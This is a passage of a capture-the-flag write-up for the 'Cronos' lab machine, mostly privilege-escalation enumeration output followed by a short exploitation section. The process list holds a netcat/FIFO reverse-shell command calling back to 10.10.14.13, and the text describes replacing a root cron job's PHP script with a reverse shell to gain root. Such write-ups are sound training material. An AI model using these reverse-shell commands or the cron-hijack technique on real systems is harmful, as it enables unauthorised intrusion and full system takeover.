/usr/sbin/rsyslogd -n daemon 957 0.0 0.2 26044 2068 ? Ss 10:48 0:00 /usr/sbin/atd -f root 963 0.0 1.9 266532 20288 ? Ssl 10:48 0:00 /usr/lib/snapd/snapd root 967 0.0 0.1 20100 1128 ? Ss 10:48 0:00 /lib/systemd/systemd-logind root 969 0.1 1.0 192236 10196 ? Ssl 10:48 0:01 /usr/bin/vmtoolsd root 989 0.0 0.1 4400 1292 ? Ss 10:48 0:00 /usr/sbin/acpid root 1036 0.0 0.0 13376 152 ? Ss 10:48 0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog root 1037 0.0 0.5 277180 5924 ? Ssl 10:48 0:00 /usr/lib/policykit-1/polkitd --no-debug root 1190 0.0 0.5 65520 5828 ? Ss 10:48 0:00 /usr/sbin/sshd -D bind 1191 0.0 1.9 208376 19556 ? Ssl 10:48 0:00 /usr/sbin/named -f -u bind -4 root 1217 0.0 0.0 5224 140 ? Ss 10:48 0:00 /sbin/iscsid root 1218 0.0 0.3 5724 3516 ? S&1|nc 10.10.14.13 445 >/tmp/f
www-data 3995 0.0 0.0 4536 724 ? S 11:12 0:00 cat /tmp/f
www-data 3996 0.0 0.3 18216 3304 ? S 11:12 0:00 /bin/bash -i
www-data 3997 0.0 0.1 11304 1656 ? S 11:12 0:00 nc 10.10.14.13 445
www-data 4020 0.0 0.3 19028 4024 ? S 11:14 0:00 /bin/bash ./linenum.sh
www-data 4021 0.0 0.3 19072 3528 ? S 11:14 0:00 /bin/bash ./linenum.sh
www-data 4022 0.0 0.0 4384 672 ? S 11:14 0:00 tee -a
www-data 4223 0.0 0.2 19056 2828 ? S 11:15 0:00 /bin/bash ./linenum.sh
www-data 4224 0.0 0.2 34424 3000 ? R 11:15 0:00 ps aux

### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.16

[-] MYSQL version:
mysql Ver 14.14 Distrib 5.7.17, for Linux (x86_64) using EditLine wrapper

[-] Apache version:
Server version: Apache/2.4.18 (Ubuntu)
Server built: 2016-07-14T12:32:26

[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data

[-] Installed Apache modules:
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
setenvif_module (shared)
status_module (shared)

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/curl

[-] Can we read/write sensitive files:
-rw-r–r– 1 root root 1667 Apr 9 2017 /etc/passwd
-rw-r–r– 1 root root 832 Apr 9 2017 /etc/group
-rw-r–r– 1 root root 575 Oct 22 2015 /etc/profile
-rw-r—– 1 root shadow 1191 Apr 9 2017 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Dec 16 2016 /bin/umount
-rwsr-xr-x 1 root root 40152 Dec 16 2016 /bin/mount
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40128 Mar 29 2016 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 38984 Mar 7 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 56456 Feb 24 2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14864 Jan 18 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 428240 Aug 11 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr– 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 40432 Mar 29 2016 /usr/bin/chsh
-rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 136808 Jan 20 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 49584 Mar 29 2016 /usr/bin/chfn
-rwsr-xr-x 1 root root 39904 Mar 29 2016 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at
-rwsr-xr-x 1 root root 23376 Jan 18 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 Mar 29 2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 54256 Mar 29 2016 /usr/bin/passwd

[-] SGID files:
-rwxr-sr-x 1 root shadow 35600 Mar 16 2016 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35632 Mar 16 2016 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root utmp 434216 Feb 7 2016 /usr/bin/screen
-rwxr-sr-x 1 root ssh 358624 Aug 11 2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 39520 Nov 18 2014 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 62336 Mar 29 2016 /usr/bin/chage
-rwxr-sr-x 1 root crontab 36080 Apr 6 2016 /usr/bin/crontab
-rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at
-rwxr-sr-x 1 root tty 27368 Dec 16 2016 /usr/bin/wall
-rwxr-sr-x 1 root tty 14752 Mar 1 2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 22768 Mar 29 2016 /usr/bin/expiry

[+] Files with POSIX capabilities set:
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep

[-] Can’t search *.conf files as no keyword was entered

[-] Can’t search *.php files as no keyword was entered

[-] Can’t search *.log files as no keyword was entered

[-] Can’t search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r–r– 1 root root 4781 Mar 17 2016 /etc/hdparm.conf
-rw-r–r– 1 root root 280 Jun 20 2014 /etc/fuse.conf
-rw-r–r– 1 root root 552 Mar 16 2016 /etc/pam.conf
-rw-r–r– 1 root root 967 Oct 30 2015 /etc/mke2fs.conf
-rw-r–r– 1 root root 7788 Mar 22 2017 /etc/ca-certificates.conf
-rw-r–r– 1 root root 338 Nov 18 2014 /etc/updatedb.conf
-rw-r–r– 1 root root 100 Nov 25 2015 /etc/sos.conf
-rw-r–r– 1 root root 1371 Jan 28 2016 /etc/rsyslog.conf
-rw-r–r– 1 root root 350 Mar 22 2017 /etc/popularity-contest.conf
-rw-r–r– 1 root root 2084 Sep 6 2015 /etc/sysctl.conf
-rw-r–r– 1 root root 604 Jul 2 2015 /etc/deluser.conf
-rw-r–r– 1 root root 2969 Nov 10 2015 /etc/debconf.conf
-rw-r–r– 1 root root 1260 Mar 16 2016 /etc/ucf.conf
-rw-r–r– 1 root root 6816 Nov 30 2016 /etc/overlayroot.conf
-rw-r–r– 1 root root 497 May 4 2014 /etc/nsswitch.conf
-rw-r–r– 1 root root 3028 Feb 15 2017 /etc/adduser.conf
-rw-r–r– 1 root root 92 Oct 22 2015 /etc/host.conf
-rw-r–r– 1 root root 34 Jan 27 2016 /etc/ld.so.conf
-rw-r–r– 1 root root 191 Jan 19 2016 /etc/libaudit.conf
-rw-r–r– 1 root root 14867 Apr 12 2016 /etc/ltrace.conf
-rw-r–r– 1 root root 2584 Feb 18 2016 /etc/gai.conf
-rw-r–r– 1 root root 703 May 6 2015 /etc/logrotate.conf
-rw-r–r– 1 root root 771 Mar 6 2015 /etc/insserv.conf
-rw-r–r– 1 root root 144 Mar 22 2017 /etc/kernel-img.conf
“`

### Exploitation

During our post-exploitation enumeration we saw the following cronjob running under the context of root: `php /var/www/laravel/artisan`

This file is under our user’s control, which means that this is a viable attack vector.

“`bash
www-data@cronos:/var/www/laravel$ ls -la artisan
-rwxr-xr-x 1 www-data www-data 1646 Apr 9 2017 artisan
“`

We will create a reverse shell written in php and upload it to the server under the name of artisan, start a listener and wait for the cronjob to get executed.

“`bash
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …
10.10.10.13 – – [06/May/2023 10:23:28] “GET /artisan HTTP/1.1” 200 –
“`

“`bash
nc -nlvp 445
listening on [any] 445 …
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.13] 53728
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
11:24:01 up 35 min, 0 users, load average: 0.00, 0.01, 0.14
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
bash: cannot set terminal process group (4626): Inappropriate ioctl for device
bash: no job control in this shell
root@cronos:/# whoami
whoami
root
root@cronos:/#
“`

TodoSec

CronOs Write-up